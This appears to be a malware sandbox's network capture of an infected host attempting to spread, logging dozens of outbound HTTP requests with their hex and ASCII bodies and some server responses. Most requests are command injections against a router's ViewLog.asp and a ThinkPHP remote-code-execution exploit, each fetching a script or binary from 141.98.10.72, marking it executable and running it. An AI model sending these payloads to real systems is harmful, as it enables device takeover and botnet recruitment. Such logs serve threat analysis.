                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      931192.168.2.155247095.244.23.1318080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.051301003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.183609009 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.401612043 CET1286INHTTP/1.0 404 Not Found
                                                      Server: http server 1.0
                                                      Content-type: text/html
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Last-modified: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Accept-Ranges: bytes
                                                      Connection: close
                                                      Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 67 69 66 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 67 69 66 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 46 46 46 46 46 20 75 72 6c 28 27 2f 63 67 69 2d 62 69 6e 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 2f 65 72 72 5f 62 67 2e 6a 70 67 27 29 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 6c 69 6e 6b 2c 2e 71 6e 61 70 5f 68 79 70 65 72 6c 69 6e 6b 20 61 3a 76 69 73 69 74 65 64 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 4c 75 63 69 64 61 20 47 72 61 6e 64 65 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 41 34 41 33 41 33 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 31 7b 0a 77 69 64 74 68 3a 20 39 38 30 70 78 3b 0a 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 42 43 42 43 42 43 3b 0a 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 7d 0a 2e 71 6e 61 70 5f 62 61 72 5f 69 6d 67 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><link rel="shortcut icon" href="/images/favicon.gif" type="image/gif" /><link rel="icon" href="/images/favicon.gif" type="image/gif" /><style type="text/css">body{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;background: #FFFFFF url('/cgi-bin/images/error/err_bg.jpg');overflow: hidden;color: #A4A3A3;text-align: center;}.qnap_hyperlink a,.qnap_hyperlink a:link,.qnap_hyperlink a:visited{font-family:Verdana, Lucida Grande, Tahoma, Arial, Helvetica, sans-serif;font-size: 11px;color: #A4A3A3;}.qnap_bar1{width: 980px;border-bottom: 1px solid #BCBCBC;padding-top: 10px;text-align: left;margin: 0 auto;}.qnap_bar_img{padding-bottom:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      932192.168.2.154235095.84.240.1418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.052349091 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:00.247502089 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      933192.168.2.154986094.123.16.1668080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.074071884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      934192.168.2.153837494.121.177.868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.074955940 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      935192.168.2.1541012112.186.69.7280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.252865076 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.539789915 CET450INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 15 Jan 2014 16:48:02 GMT
                                                      Location: https://localhost.kornet/index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Content-Length: 56
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 42 4f 44 59 3e 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 48 31 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                      Data Ascii: <HTML><BODY><H1>301 Moved Permanently</H1></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      936192.168.2.1559798112.186.20.3880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.252996922 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      937192.168.2.154816894.46.22.1258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.261823893 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:01.383502007 CET386INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/7.4.33
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-transform, no-cache, no-store, must-revalidate
                                                      X-Redirect-By: WordPress
                                                      Location: http://192.168.0.14/cgi-bin/ViewLog.asp
                                                      Content-Length: 0
                                                      Connection: close
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      938192.168.2.154867462.78.62.348080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.309571028 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      939192.168.2.154759294.121.18.1698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.321532011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      940192.168.2.154429094.121.45.958080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.321655035 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      941192.168.2.154068231.200.25.138080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.321887016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      942192.168.2.154826294.121.183.2148080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.323376894 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      943192.168.2.155851295.100.66.16680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.454642057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.655299902 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 65 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 66 32 38 31 62 66 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;be7a7b5c&#46;1707899459&#46;5f281bf4</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      944192.168.2.155377295.211.212.4080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.478487968 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.703999996 CET355INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.0 (Ubuntu)
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 182
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      945192.168.2.154352694.123.137.2198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.558975935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      946192.168.2.153950895.100.185.22880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.656688929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:59.858684063 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:59 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 33 65 32 32 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 34 35 39 26 23 34 36 3b 35 35 66 35 36 30 62 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d3e2217&#46;1707899459&#46;55f560b8</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      947192.168.2.154463695.217.7.13580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:59.698561907 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
